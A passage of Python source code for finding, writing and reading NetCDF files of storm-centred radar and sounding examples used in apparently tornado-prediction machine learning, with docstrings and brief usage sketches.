last_batch_number = first_batch_number + NUM_BATCHES_PER_DIRECTORY - 1
example_file_name = (
'{0:s}/batches{1:07d}-{2:07d}/input_examples_batch{3:07d}.nc'
).format(top_directory_name, first_batch_number, last_batch_number,
batch_number)
else:
time_conversion.spc_date_string_to_unix_sec(spc_date_string)
example_file_name = (
'{0:s}/{1:s}/input_examples_{2:s}.nc'
).format(top_directory_name, spc_date_string[:4], spc_date_string)
if raise_error_if_missing and not os.path.isfile(example_file_name):
error_string = 'Cannot find file. Expected at: "{0:s}"'.format(
example_file_name)
raise ValueError(error_string)
return example_file_name
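# Usage sketch (illustrative only): assuming NUM_BATCHES_PER_DIRECTORY = 1000,
# the first call returns
# "/data/examples/batches0001000-0001999/input_examples_batch0001234.nc" and
# the second returns "/data/examples/2011/input_examples_20110404.nc".  The
# top directory, batch number, and SPC date are placeholders.
def _demo_find_example_file():
    shuffled_file_name = find_example_file(
        top_directory_name='/data/examples', shuffled=True, batch_number=1234,
        raise_error_if_missing=False)
    spc_date_file_name = find_example_file(
        top_directory_name='/data/examples', shuffled=False,
        spc_date_string='20110404', raise_error_if_missing=False)
    return shuffled_file_name, spc_date_file_name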
def find_many_example_files(
top_directory_name, shuffled=True, first_spc_date_string=None,
last_spc_date_string=None, first_batch_number=None,
last_batch_number=None, raise_error_if_any_missing=True):
"""Looks for many files with input examples.
:param top_directory_name: See doc for `find_example_file`.
:param shuffled: Same.
:param first_spc_date_string: [used only if `shuffled = False`]
First SPC date (format "yyyymmdd"). This method will look for all SPC
dates from `first_spc_date_string`...`last_spc_date_string`.
:param last_spc_date_string: See above.
:param first_batch_number: [used only if `shuffled = True`]
First batch number (integer). This method will look for all batches
from `first_batch_number`...`last_batch_number`.
:param last_batch_number: See above.
:param raise_error_if_any_missing: Boolean flag. If *any* desired file is
not found and `raise_error_if_any_missing = True`, this method will
error out.
:return: example_file_names: 1-D list of paths to example files.
:raises: ValueError: if no files are found.
"""
error_checking.assert_is_boolean(shuffled)
if shuffled:
error_checking.assert_is_integer(first_batch_number)
error_checking.assert_is_integer(last_batch_number)
error_checking.assert_is_geq(first_batch_number, 0)
error_checking.assert_is_geq(last_batch_number, first_batch_number)
example_file_pattern = (
'{0:s}/batches{1:s}-{1:s}/input_examples_batch{1:s}.nc'
).format(top_directory_name, BATCH_NUMBER_REGEX)
example_file_names = glob.glob(example_file_pattern)
if len(example_file_names) > 0:
batch_numbers = numpy.array(
[_file_name_to_batch_number(f) for f in example_file_names],
dtype=int)
good_indices = numpy.where(numpy.logical_and(
batch_numbers >= first_batch_number,
batch_numbers <= last_batch_number
))[0]
example_file_names = [example_file_names[k] for k in good_indices]
if len(example_file_names) == 0:
error_string = (
'Cannot find any files with batch number from {0:d}...{1:d}.'
).format(first_batch_number, last_batch_number)
raise ValueError(error_string)
return example_file_names
spc_date_strings = time_conversion.get_spc_dates_in_range(
first_spc_date_string=first_spc_date_string,
last_spc_date_string=last_spc_date_string)
example_file_names = []
for this_spc_date_string in spc_date_strings:
this_file_name = find_example_file(
top_directory_name=top_directory_name, shuffled=False,
spc_date_string=this_spc_date_string,
raise_error_if_missing=raise_error_if_any_missing)
if not os.path.isfile(this_file_name):
continue
example_file_names.append(this_file_name)
if len(example_file_names) == 0:
error_string = (
'Cannot find any file with SPC date from {0:s} to {1:s}.'
).format(first_spc_date_string, last_spc_date_string)
raise ValueError(error_string)
return example_file_names
def write_example_file(netcdf_file_name, example_dict, append_to_file=False):
"""Writes input examples to NetCDF file.
The following keys are required in `example_dict` only if the examples
include soundings:
- "sounding_field_names"
- "sounding_heights_m_agl"
- "sounding_matrix"
If the examples contain both 2-D azimuthal-shear images and 3-D
reflectivity images:
- Keys "reflectivity_image_matrix_dbz" and "az_shear_image_matrix_s01" are
required.
- "radar_heights_m_agl" should contain only reflectivity heights.
- "radar_field_names" should contain only the names of azimuthal-shear
fields.
If the examples contain 2-D radar images and no 3-D images:
- Key "radar_image_matrix" is required.
- The [j]th element of "radar_field_names" should be the name of the [j]th
radar field.
- The [j]th element of "radar_heights_m_agl" should be the corresponding
height.
- Thus, there are C elements in "radar_field_names", C elements in
"radar_heights_m_agl", and C field-height pairs.
If the examples contain 3-D radar images and no 2-D images:
- Key "radar_image_matrix" is required.
- Each field in "radar_field_names" appears at each height in
"radar_heights_m_agl".
- Thus, there are F_r elements in "radar_field_names", H_r elements in
"radar_heights_m_agl", and F_r * H_r field-height pairs.
:param netcdf_file_name: Path to output file.
:param example_dict: Dictionary with the following keys.
example_dict['full_id_strings']: length-E list of full storm IDs.
example_dict['storm_times_unix_sec']: length-E list of valid times.
example_dict['radar_field_names']: List of radar fields (see general
discussion above).
example_dict['radar_heights_m_agl']: numpy array of radar heights (see
general discussion above).
example_dict['rotated_grids']: Boolean flag. If True, storm-centered radar
grids are rotated so that storm motion is in the +x-direction.
example_dict['rotated_grid_spacing_metres']: Spacing of rotated grids. If
grids are not rotated, this should be None.
example_dict['radar_image_matrix']: See general discussion above. For 2-D
images, this should be a numpy array with dimensions E x M x N x C.
For 3-D images, this should be a numpy array with dimensions
E x M x N x H_r x F_r.
example_dict['reflectivity_image_matrix_dbz']: See general discussion above.
Dimensions should be E x M x N x H_refl x 1, where H_refl = number of
reflectivity heights.
example_dict['az_shear_image_matrix_s01']: See general discussion above.
Dimensions should be E x M x N x F_as, where F_as = number of
azimuthal-shear fields.
example_dict['target_names']: 1-D list with names of target variables. Each
must be accepted by `target_val_utils.target_name_to_params`.
example_dict['target_matrix']: E-by-T numpy array of target values (integer
class labels), where T = number of target variables.
example_dict['sounding_field_names']: list (length F_s) of sounding fields.
Each item must be accepted by `soundings.check_field_name`.
example_dict['sounding_heights_m_agl']: numpy array (length H_s) of sounding
heights (metres above ground level).
example_dict['sounding_matrix']: numpy array (E x H_s x F_s) of storm-
centered soundings.
:param append_to_file: Boolean flag. If True, this method will append to an
existing file. If False, will create a new file, overwriting the
existing file if necessary.
"""
error_checking.assert_is_boolean(append_to_file)
include_soundings = SOUNDING_MATRIX_KEY in example_dict
if append_to_file:
netcdf_dataset = netCDF4.Dataset(
netcdf_file_name, 'a', format='NETCDF3_64BIT_OFFSET'
)
_compare_metadata(
netcdf_dataset=netcdf_dataset, example_dict=example_dict
)
num_examples_orig = len(numpy.array(
netcdf_dataset.variables[STORM_TIMES_KEY][:]
))
num_examples_to_add = len(example_dict[STORM_TIMES_KEY])
this_string_type = 'S{0:d}'.format(
netcdf_dataset.dimensions[STORM_ID_CHAR_DIM_KEY].size
)
example_dict[FULL_IDS_KEY] = netCDF4.stringtochar(numpy.array(
example_dict[FULL_IDS_KEY], dtype=this_string_type
))
for this_key in MAIN_KEYS:
if (this_key not in REQUIRED_MAIN_KEYS and
this_key not in netcdf_dataset.variables):
continue
netcdf_dataset.variables[this_key][
num_examples_orig:(num_examples_orig + num_examples_to_add),
...
] = example_dict[this_key]
netcdf_dataset.close()
return
# Open file.
file_system_utils.mkdir_recursive_if_necessary(file_name=netcdf_file_name)
netcdf_dataset = netCDF4.Dataset(
netcdf_file_name, 'w', format='NETCDF3_64BIT_OFFSET')
# Set global attributes.
netcdf_dataset.setncattr(
ROTATED_GRIDS_KEY, int(example_dict[ROTATED_GRIDS_KEY])
)
if example_dict[ROTATED_GRIDS_KEY]:
netcdf_dataset.setncattr(
ROTATED_GRID_SPACING_KEY,
numpy.round(int(example_dict[ROTATED_GRID_SPACING_KEY]))
)
# Set dimensions.
num_storm_id_chars = 10 + numpy.max(
numpy.array([len(s) for s in example_dict[FULL_IDS_KEY]])
)
num_radar_field_chars = numpy.max(
numpy.array([len(f) for f in example_dict[RADAR_FIELDS_KEY]])
)
num_target_name_chars = numpy.max(
numpy.array([len(t) for t in example_dict[TARGET_NAMES_KEY]])
)
num_target_vars = len(example_dict[TARGET_NAMES_KEY])
netcdf_dataset.createDimension(EXAMPLE_DIMENSION_KEY, None)
netcdf_dataset.createDimension(TARGET_VARIABLE_DIM_KEY, num_target_vars)
netcdf_dataset.createDimension(STORM_ID_CHAR_DIM_KEY, num_storm_id_chars)
netcdf_dataset.createDimension(
RADAR_FIELD_CHAR_DIM_KEY, num_radar_field_chars
)
netcdf_dataset.createDimension(
TARGET_NAME_CHAR_DIM_KEY, num_target_name_chars
)
if RADAR_IMAGE_MATRIX_KEY in example_dict:
num_grid_rows = example_dict[RADAR_IMAGE_MATRIX_KEY].shape[1]
num_grid_columns = example_dict[RADAR_IMAGE_MATRIX_KEY].shape[2]
num_radar_dimensions = len(
example_dict[RADAR_IMAGE_MATRIX_KEY].shape) - 2
if num_radar_dimensions == 3:
num_radar_heights = example_dict[RADAR_IMAGE_MATRIX_KEY].shape[3]
num_radar_fields = example_dict[RADAR_IMAGE_MATRIX_KEY].shape[4]
netcdf_dataset.createDimension(
RADAR_FIELD_DIM_KEY, num_radar_fields)
netcdf_dataset.createDimension(
RADAR_HEIGHT_DIM_KEY, num_radar_heights)
else:
num_radar_channels = example_dict[RADAR_IMAGE_MATRIX_KEY].shape[3]
netcdf_dataset.createDimension(
RADAR_CHANNEL_DIM_KEY, num_radar_channels)
netcdf_dataset.createDimension(ROW_DIMENSION_KEY, num_grid_rows)
netcdf_dataset.createDimension(COLUMN_DIMENSION_KEY, num_grid_columns)
else:
num_reflectivity_rows = example_dict[REFL_IMAGE_MATRIX_KEY].shape[1]
num_reflectivity_columns = example_dict[REFL_IMAGE_MATRIX_KEY].shape[2]
num_reflectivity_heights = example_dict[REFL_IMAGE_MATRIX_KEY].shape[3]
num_az_shear_rows = example_dict[AZ_SHEAR_IMAGE_MATRIX_KEY].shape[1]
num_az_shear_columns = example_dict[AZ_SHEAR_IMAGE_MATRIX_KEY].shape[2]
num_az_shear_fields = example_dict[AZ_SHEAR_IMAGE_MATRIX_KEY].shape[3]
netcdf_dataset.createDimension(
REFL_ROW_DIMENSION_KEY, num_reflectivity_rows)
netcdf_dataset.createDimension(
REFL_COLUMN_DIMENSION_KEY, num_reflectivity_columns)
netcdf_dataset.createDimension(
RADAR_HEIGHT_DIM_KEY, num_reflectivity_heights)
netcdf_dataset.createDimension(
AZ_SHEAR_ROW_DIMENSION_KEY, num_az_shear_rows)
netcdf_dataset.createDimension(
AZ_SHEAR_COLUMN_DIMENSION_KEY, num_az_shear_columns)
netcdf_dataset.createDimension(RADAR_FIELD_DIM_KEY, num_az_shear_fields)
num_radar_dimensions = -1
# Add storm IDs.
this_string_type = 'S{0:d}'.format(num_storm_id_chars)
full_ids_char_array = netCDF4.stringtochar(numpy.array(
example_dict[FULL_IDS_KEY], dtype=this_string_type
))
netcdf_dataset.createVariable(
FULL_IDS_KEY, datatype='S1',
dimensions=(EXAMPLE_DIMENSION_KEY, STORM_ID_CHAR_DIM_KEY)
)
netcdf_dataset.variables[FULL_IDS_KEY][:] = numpy.array(full_ids_char_array)
# Add names of radar fields.
this_string_type = 'S{0:d}'.format(num_radar_field_chars)
radar_field_names_char_array = netCDF4.stringtochar(numpy.array(
example_dict[RADAR_FIELDS_KEY], dtype=this_string_type
))
if num_radar_dimensions == 2:
this_first_dim_key = RADAR_CHANNEL_DIM_KEY + ''
else:
this_first_dim_key = RADAR_FIELD_DIM_KEY + ''
netcdf_dataset.createVariable(
RADAR_FIELDS_KEY, datatype='S1',
dimensions=(this_first_dim_key, RADAR_FIELD_CHAR_DIM_KEY)
)
netcdf_dataset.variables[RADAR_FIELDS_KEY][:] = numpy.array(
radar_field_names_char_array)
# Add names of target variables.
this_string_type = 'S{0:d}'.format(num_target_name_chars)
target_names_char_array = netCDF4.stringtochar(numpy.array(
example_dict[TARGET_NAMES_KEY], dtype=this_string_type
))
netcdf_dataset.createVariable(
TARGET_NAMES_KEY, datatype='S1',
dimensions=(TARGET_VARIABLE_DIM_KEY, TARGET_NAME_CHAR_DIM_KEY)
)
netcdf_dataset.variables[TARGET_NAMES_KEY][:] = numpy.array(
target_names_char_array)
# Add storm times.
netcdf_dataset.createVariable(
STORM_TIMES_KEY, datatype=numpy.int32, dimensions=EXAMPLE_DIMENSION_KEY
)
netcdf_dataset.variables[STORM_TIMES_KEY][:] = example_dict[
STORM_TIMES_KEY]
# Add target values.
netcdf_dataset.createVariable(
TARGET_MATRIX_KEY, datatype=numpy.int32,
dimensions=(EXAMPLE_DIMENSION_KEY, TARGET_VARIABLE_DIM_KEY)
)
netcdf_dataset.variables[TARGET_MATRIX_KEY][:] = example_dict[
TARGET_MATRIX_KEY]
# Add radar heights.
if num_radar_dimensions == 2:
this_dimension_key = RADAR_CHANNEL_DIM_KEY + ''
else:
this_dimension_key = RADAR_HEIGHT_DIM_KEY + ''
netcdf_dataset.createVariable(
RADAR_HEIGHTS_KEY, datatype=numpy.int32, dimensions=this_dimension_key
)
netcdf_dataset.variables[RADAR_HEIGHTS_KEY][:] = example_dict[
RADAR_HEIGHTS_KEY]
# Add storm-centered radar images.
if RADAR_IMAGE_MATRIX_KEY in example_dict:
if num_radar_dimensions == 3:
these_dimensions = (
EXAMPLE_DIMENSION_KEY, ROW_DIMENSION_KEY, COLUMN_DIMENSION_KEY,
RADAR_HEIGHT_DIM_KEY, RADAR_FIELD_DIM_KEY
)
else:
these_dimensions = (
EXAMPLE_DIMENSION_KEY, ROW_DIMENSION_KEY, COLUMN_DIMENSION_KEY,
RADAR_CHANNEL_DIM_KEY
)
netcdf_dataset.createVariable(
RADAR_IMAGE_MATRIX_KEY, datatype=numpy.float32,
dimensions=these_dimensions
)
netcdf_dataset.variables[RADAR_IMAGE_MATRIX_KEY][:] = example_dict[
RADAR_IMAGE_MATRIX_KEY]
else:
netcdf_dataset.createVariable(
REFL_IMAGE_MATRIX_KEY, datatype=numpy.float32,
dimensions=(EXAMPLE_DIMENSION_KEY, REFL_ROW_DIMENSION_KEY,
REFL_COLUMN_DIMENSION_KEY, RADAR_HEIGHT_DIM_KEY)
)
netcdf_dataset.variables[REFL_IMAGE_MATRIX_KEY][:] = example_dict[
REFL_IMAGE_MATRIX_KEY][..., 0]
netcdf_dataset.createVariable(
AZ_SHEAR_IMAGE_MATRIX_KEY, datatype=numpy.float32,
dimensions=(EXAMPLE_DIMENSION_KEY, AZ_SHEAR_ROW_DIMENSION_KEY,
AZ_SHEAR_COLUMN_DIMENSION_KEY, RADAR_FIELD_DIM_KEY)
)
netcdf_dataset.variables[AZ_SHEAR_IMAGE_MATRIX_KEY][:] = example_dict[
AZ_SHEAR_IMAGE_MATRIX_KEY]
if not include_soundings:
netcdf_dataset.close()
return
num_sounding_heights = example_dict[SOUNDING_MATRIX_KEY].shape[1]
num_sounding_fields = example_dict[SOUNDING_MATRIX_KEY].shape[2]
num_sounding_field_chars = 1
for j in range(num_sounding_fields):
num_sounding_field_chars = max([
num_sounding_field_chars,
len(example_dict[SOUNDING_FIELDS_KEY][j])
])
netcdf_dataset.createDimension(
SOUNDING_FIELD_DIM_KEY, num_sounding_fields)
netcdf_dataset.createDimension(
SOUNDING_HEIGHT_DIM_KEY, num_sounding_heights)
netcdf_dataset.createDimension(
SOUNDING_FIELD_CHAR_DIM_KEY, num_sounding_field_chars)
this_string_type = 'S{0:d}'.format(num_sounding_field_chars)
sounding_field_names_char_array = netCDF4.stringtochar(numpy.array(
example_dict[SOUNDING_FIELDS_KEY], dtype=this_string_type
))
netcdf_dataset.createVariable(
SOUNDING_FIELDS_KEY, datatype='S1',
dimensions=(SOUNDING_FIELD_DIM_KEY, SOUNDING_FIELD_CHAR_DIM_KEY)
)
netcdf_dataset.variables[SOUNDING_FIELDS_KEY][:] = numpy.array(
sounding_field_names_char_array)
netcdf_dataset.createVariable(
SOUNDING_HEIGHTS_KEY, datatype=numpy.int32,
dimensions=SOUNDING_HEIGHT_DIM_KEY
)
netcdf_dataset.variables[SOUNDING_HEIGHTS_KEY][:] = example_dict[
SOUNDING_HEIGHTS_KEY]
netcdf_dataset.createVariable(
SOUNDING_MATRIX_KEY, datatype=numpy.float32,
dimensions=(EXAMPLE_DIMENSION_KEY, SOUNDING_HEIGHT_DIM_KEY,
SOUNDING_FIELD_DIM_KEY)
)
netcdf_dataset.variables[SOUNDING_MATRIX_KEY][:] = example_dict[
SOUNDING_MATRIX_KEY]
netcdf_dataset.close()
return
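# Usage sketch (illustrative only): minimal `example_dict` with one example,
# one 2-D radar field-height pair, and one target variable.  The storm ID,
# radar field name, and target name are placeholders; array values are zeros.
def _demo_write_example_file(netcdf_file_name):
    import numpy
    example_dict = {
        FULL_IDS_KEY: ['000000_20110404'],
        STORM_TIMES_KEY: numpy.array([1301961600], dtype=int),
        RADAR_FIELDS_KEY: ['reflectivity_dbz'],
        RADAR_HEIGHTS_KEY: numpy.array([1000], dtype=int),
        ROTATED_GRIDS_KEY: False,
        ROTATED_GRID_SPACING_KEY: None,
        RADAR_IMAGE_MATRIX_KEY: numpy.zeros((1, 32, 32, 1)),
        TARGET_NAMES_KEY: [
            'tornado_lead-time=0000-3600sec_distance=00000-30000m_min-fujita=0'
        ],
        TARGET_MATRIX_KEY: numpy.zeros((1, 1), dtype=int)
    }
    write_example_file(
        netcdf_file_name=netcdf_file_name, example_dict=example_dict,
        append_to_file=False)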
def read_example_file(
netcdf_file_name, read_all_target_vars, target_name=None,
metadata_only=False, targets_only=False, include_soundings=True,
radar_field_names_to_keep=None, radar_heights_to_keep_m_agl=None,
sounding_field_names_to_keep=None, sounding_heights_to_keep_m_agl=None,
first_time_to_keep_unix_sec=None, last_time_to_keep_unix_sec=None,
num_rows_to_keep=None, num_columns_to_keep=None,
downsampling_dict=None):
"""Reads examples from NetCDF file.
    If `metadata_only == True`, all subsequent input args are ignored.
    If `targets_only == True`, all radar- and sounding-related input args are ignored.
:param netcdf_file_name: Path to input file.
:param read_all_target_vars: Boolean flag. If True, will read all target
variables. If False, will read only `target_name`. Either way, if
downsampling is done, it will be based only on `target_name`.
:param target_name: Will read this target variable. If
`read_all_target_vars == True` and `downsampling_dict is None`, you can
leave this alone.
:param metadata_only: Boolean flag. If False, this method will read
everything. If True, will read everything except predictor and target
variables.
:param targets_only: Boolean flag. If False, this method will read
everything. If True, will read everything except predictors.
:param include_soundings: Boolean flag. If True and the file contains
soundings, this method will return soundings. Otherwise, no soundings.
:param radar_field_names_to_keep: See doc for `_subset_radar_data`.
:param radar_heights_to_keep_m_agl: Same.
:param sounding_field_names_to_keep: See doc for `_subset_sounding_data`.
:param sounding_heights_to_keep_m_agl: Same.
:param first_time_to_keep_unix_sec: First time to keep. If
`first_time_to_keep_unix_sec is None`, all storm objects will be kept.
:param last_time_to_keep_unix_sec: Last time to keep. If
`last_time_to_keep_unix_sec is None`, all storm objects will be kept.
:param num_rows_to_keep: See doc for `_subset_radar_data`.
:param num_columns_to_keep: Same.
:param downsampling_dict: See doc for `_filter_examples_by_class`.
:return: example_dict: If `read_all_target_vars == True`, dictionary will
have all keys listed in doc for `write_example_file`. If
`read_all_target_vars == False`, key "target_names" will be replaced by
"target_name" and "target_matrix" will be replaced by "target_values".
example_dict['target_name']: Name of target variable.
example_dict['target_values']: length-E list of target values (integer
class labels), where E = number of examples.
"""
# TODO(thunderhoser): Allow this method to read only soundings without radar
# data.
if (
target_name ==
'tornado_lead-time=0000-3600sec_distance=00000-10000m'
):
target_name = (
'tornado_lead-time=0000-3600sec_distance=00000-30000m_min-fujita=0'
)
error_checking.assert_is_boolean(read_all_target_vars)
error_checking.assert_is_boolean(include_soundings)
error_checking.assert_is_boolean(metadata_only)
error_checking.assert_is_boolean(targets_only)
example_dict, netcdf_dataset = _read_metadata_from_example_file(
netcdf_file_name=netcdf_file_name, include_soundings=include_soundings)
need_main_target_values = (
not read_all_target_vars
or downsampling_dict is not None
)
if need_main_target_values:
target_index = example_dict[TARGET_NAMES_KEY].index(target_name)
else:
target_index = -1
if not read_all_target_vars:
example_dict[TARGET_NAME_KEY] = target_name
example_dict.pop(TARGET_NAMES_KEY)
if metadata_only:
netcdf_dataset.close()
return example_dict
if need_main_target_values:
main_target_values = numpy.array(
netcdf_dataset.variables[TARGET_MATRIX_KEY][:, target_index],
dtype=int
)
else:
main_target_values = None
if read_all_target_vars:
example_dict[TARGET_MATRIX_KEY] = numpy.array(
netcdf_dataset.variables[TARGET_MATRIX_KEY][:], dtype=int
)
else:
example_dict[TARGET_VALUES_KEY] = main_target_values
# Subset by time.
if first_time_to_keep_unix_sec is None:
first_time_to_keep_unix_sec = 0
if last_time_to_keep_unix_sec is None:
last_time_to_keep_unix_sec = int(1e12)
error_checking.assert_is_integer(first_time_to_keep_unix_sec)
error_checking.assert_is_integer(last_time_to_keep_unix_sec)
error_checking.assert_is_geq(
last_time_to_keep_unix_sec, first_time_to_keep_unix_sec)
example_indices_to_keep = numpy.where(numpy.logical_and(
example_dict[STORM_TIMES_KEY] >= first_time_to_keep_unix_sec,
example_dict[STORM_TIMES_KEY] <= last_time_to_keep_unix_sec
))[0]
if downsampling_dict is not None:
subindices_to_keep = _filter_examples_by_class(
target_values=main_target_values[example_indices_to_keep],
downsampling_dict=downsampling_dict
)
elif not read_all_target_vars:
subindices_to_keep = numpy.where(
main_target_values[example_indices_to_keep] !=
target_val_utils.INVALID_STORM_INTEGER
)[0]
else:
subindices_to_keep = numpy.linspace(
0, len(example_indices_to_keep) - 1,
num=len(example_indices_to_keep), dtype=int
)
example_indices_to_keep = example_indices_to_keep[subindices_to_keep]
if len(example_indices_to_keep) == 0:
return None
example_dict[FULL_IDS_KEY] = [
example_dict[FULL_IDS_KEY][k] for k in example_indices_to_keep
]
example_dict[STORM_TIMES_KEY] = (
example_dict[STORM_TIMES_KEY][example_indices_to_keep]
)
if read_all_target_vars:
example_dict[TARGET_MATRIX_KEY] = (
example_dict[TARGET_MATRIX_KEY][example_indices_to_keep, :]
)
else:
example_dict[TARGET_VALUES_KEY] = (
example_dict[TARGET_VALUES_KEY][example_indices_to_keep]
)
if targets_only:
netcdf_dataset.close()
return example_dict
example_dict = _subset_radar_data(
example_dict=example_dict, netcdf_dataset_object=netcdf_dataset,
example_indices_to_keep=example_indices_to_keep,
field_names_to_keep=radar_field_names_to_keep,
heights_to_keep_m_agl=radar_heights_to_keep_m_agl,
num_rows_to_keep=num_rows_to_keep,
num_columns_to_keep=num_columns_to_keep)
if not include_soundings:
netcdf_dataset.close()
return example_dict
example_dict = _subset_sounding_data(
example_dict=example_dict, netcdf_dataset_object=netcdf_dataset,
example_indices_to_keep=example_indices_to_keep,
field_names_to_keep=sounding_field_names_to_keep,
heights_to_keep_m_agl=sounding_heights_to_keep_m_agl)
netcdf_dataset.close()
return example_dict
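# Usage sketch (illustrative only): read one target variable from one file,
# keeping a single radar field/height and a 32 x 32 grid.  The field name,
# height, and target name are placeholders.
def _demo_read_example_file(netcdf_file_name):
    import numpy
    return read_example_file(
        netcdf_file_name=netcdf_file_name, read_all_target_vars=False,
        target_name=
        'tornado_lead-time=0000-3600sec_distance=00000-30000m_min-fujita=0',
        radar_field_names_to_keep=['reflectivity_dbz'],
        radar_heights_to_keep_m_agl=numpy.array([1000], dtype=int),
        num_rows_to_keep=32, num_columns_to_keep=32)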
def read_specific_examples(
netcdf_file_name, read_all_target_vars, full_storm_id_strings,
storm_times_unix_sec, target_name=None, include_soundings=True,
radar_field_names_to_keep=None, radar_heights_to_keep_m_agl=None,
sounding_field_names_to_keep=None, sounding_heights_to_keep_m_agl=None,
num_rows_to_keep=None, num_columns_to_keep=None):
"""Reads specific examples (with specific ID-time pairs) from NetCDF file.
:param netcdf_file_name: Path to input file.
:param read_all_target_vars: See doc for `read_example_file`.
:param full_storm_id_strings: length-E list of storm IDs.
:param storm_times_unix_sec: length-E numpy array of valid times.
:param target_name: See doc for `read_example_file`.
:param include_soundings: Same.
:param radar_field_names_to_keep: Same.
:param radar_heights_to_keep_m_agl: Same.
:param sounding_field_names_to_keep: Same.
:param sounding_heights_to_keep_m_agl: Same.
:param num_rows_to_keep: Same.
:param num_columns_to_keep: Same.
:return: example_dict: See doc for `write_example_file`.
"""
if (
target_name ==
'tornado_lead-time=0000-3600sec_distance=00000-10000m'
):
target_name = (
'tornado_lead-time=0000-3600sec_distance=00000-30000m_min-fujita=0'
)
error_checking.assert_is_boolean(read_all_target_vars)
error_checking.assert_is_boolean(include_soundings)
example_dict, dataset_object = _read_metadata_from_example_file(
netcdf_file_name=netcdf_file_name, include_soundings=include_soundings)
example_indices_to_keep = tracking_utils.find_storm_objects(
all_id_strings=example_dict[FULL_IDS_KEY],
all_times_unix_sec=example_dict[STORM_TIMES_KEY],
id_strings_to_keep=full_storm_id_strings,
times_to_keep_unix_sec=storm_times_unix_sec, allow_missing=False
)
example_dict[FULL_IDS_KEY] = [
example_dict[FULL_IDS_KEY][k] for k in example_indices_to_keep
]
example_dict[STORM_TIMES_KEY] = example_dict[STORM_TIMES_KEY][
example_indices_to_keep]
if read_all_target_vars:
example_dict[TARGET_MATRIX_KEY] = numpy.array(
dataset_object.variables[TARGET_MATRIX_KEY][
example_indices_to_keep, :],
dtype=int
)
else:
target_index = example_dict[TARGET_NAMES_KEY].index(target_name)
example_dict[TARGET_NAME_KEY] = target_name
example_dict.pop(TARGET_NAMES_KEY)
example_dict[TARGET_VALUES_KEY] = numpy.array(
dataset_object.variables[TARGET_MATRIX_KEY][
example_indices_to_keep, target_index],
dtype=int
)
example_dict = _subset_radar_data(
example_dict=example_dict, netcdf_dataset_object=dataset_object,
example_indices_to_keep=example_indices_to_keep,
field_names_to_keep=radar_field_names_to_keep,
heights_to_keep_m_agl=radar_heights_to_keep_m_agl,
num_rows_to_keep=num_rows_to_keep,
num_columns_to_keep=num_columns_to_keep)
if not include_soundings:
dataset_object.close()
return example_dict
example_dict = _subset_sounding_data(
example_dict=example_dict, netcdf_dataset_object=dataset_object,
example_indices_to_keep=example_indices_to_keep,
field_names_to_keep=sounding_field_names_to_keep,
heights_to_keep_m_agl=sounding_heights_to_keep_m_agl)
dataset_object.close()
return example_dict
def reduce_examples_3d_to_2d(example_dict, list_of_operation_dicts):
"""Reduces examples from 3-D to 2-D.
If the examples contain both 2-D azimuthal-shear images and 3-D
reflectivity images:
- Keys "reflectivity_image_matrix_dbz" and "az_shear_image_matrix_s01" are
required.
- "radar_heights_m_agl" should contain only reflectivity heights.
- "radar_field_names" should contain only the names of azimuthal-shear
fields.
If the examples contain 3-D radar images and no 2-D images:
- Key "radar_image_matrix" is required.
- Each field in "radar_field_names" appears at each height in
"radar_heights_m_agl".
- Thus, there are F_r elements in "radar_field_names", H_r elements in
"radar_heights_m_agl", and F_r * H_r field-height pairs.
After dimensionality reduction (from 3-D to 2-D):
- Keys "reflectivity_image_matrix_dbz", "az_shear_image_matrix_s01", and
"radar_heights_m_agl" will be absent.
- Key "radar_image_matrix" will be present. The dimensions will be
E x M x N x C.
- Key "radar_field_names" will be a length-C list, where the [j]th item is
the field name for the [j]th channel of radar_image_matrix
(radar_image_matrix[..., j]).
- Key "min_radar_heights_m_agl" will be a length-C numpy array, where the
[j]th item is the MINIMUM height for the [j]th channel of
radar_image_matrix.
- Key "max_radar_heights_m_agl" will be a length-C numpy array, where the
[j]th item is the MAX height for the [j]th channel of radar_image_matrix.
- Key "radar_layer_operation_names" will be a length-C list, where the [j]th
item is the name of the operation used to create the [j]th channel of
radar_image_matrix.
:param example_dict: See doc for `write_example_file`.
:param list_of_operation_dicts: See doc for `_check_layer_operation`.
:return: example_dict: See general discussion above, for how the input
`example_dict` is changed to the output `example_dict`.
"""
if RADAR_IMAGE_MATRIX_KEY in example_dict:
num_radar_dimensions = len(
example_dict[RADAR_IMAGE_MATRIX_KEY].shape
) - 2
assert num_radar_dimensions == 3
new_radar_image_matrix = None
new_field_names = []
new_min_heights_m_agl = []
new_max_heights_m_agl = []
new_operation_names = []
if AZ_SHEAR_IMAGE_MATRIX_KEY in example_dict:
new_radar_image_matrix = example_dict[AZ_SHEAR_IMAGE_MATRIX_KEY] + 0.
for this_field_name in example_dict[RADAR_FIELDS_KEY]:
new_field_names.append(this_field_name)
new_operation_names.append(MAX_OPERATION_NAME)
if this_field_name == radar_utils.LOW_LEVEL_SHEAR_NAME:
new_min_heights_m_agl.append(0)
new_max_heights_m_agl.append(2000)
else:
new_min_heights_m_agl.append(3000)
new_max_heights_m_agl.append(6000)
for this_operation_dict in list_of_operation_dicts:
this_new_matrix, this_operation_dict = _apply_layer_operation(
example_dict=example_dict, operation_dict=this_operation_dict)
this_new_matrix = numpy.expand_dims(this_new_matrix, axis=-1)
if new_radar_image_matrix is None:
new_radar_image_matrix = this_new_matrix + 0.
else:
new_radar_image_matrix = numpy.concatenate(
(new_radar_image_matrix, this_new_matrix), axis=-1
)
new_field_names.append(this_operation_dict[RADAR_FIELD_KEY])
new_min_heights_m_agl.append(this_operation_dict[MIN_HEIGHT_KEY])
new_max_heights_m_agl.append(this_operation_dict[MAX_HEIGHT_KEY])
new_operation_names.append(this_operation_dict[OPERATION_NAME_KEY])
example_dict.pop(REFL_IMAGE_MATRIX_KEY, None)
example_dict.pop(AZ_SHEAR_IMAGE_MATRIX_KEY, None)
example_dict.pop(RADAR_HEIGHTS_KEY, None)
example_dict[RADAR_IMAGE_MATRIX_KEY] = new_radar_image_matrix
example_dict[RADAR_FIELDS_KEY] = new_field_names
example_dict[MIN_RADAR_HEIGHTS_KEY] = numpy.array(
new_min_heights_m_agl, dtype=int)
example_dict[MAX_RADAR_HEIGHTS_KEY] = numpy.array(
new_max_heights_m_agl, dtype=int)
example_dict[RADAR_LAYER_OPERATION_NAMES_KEY] = new_operation_names
return example_dict
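# Usage sketch (illustrative only): collapse 3-D reflectivity into two 2-D
# channels by taking the column-max over 1000-3000 m AGL and 3000-6000 m AGL.
# The field name "reflectivity_dbz" is a placeholder; the dictionary keys are
# the module-level constants checked by `_check_layer_operation`.
def _demo_reduce_examples_3d_to_2d(example_dict):
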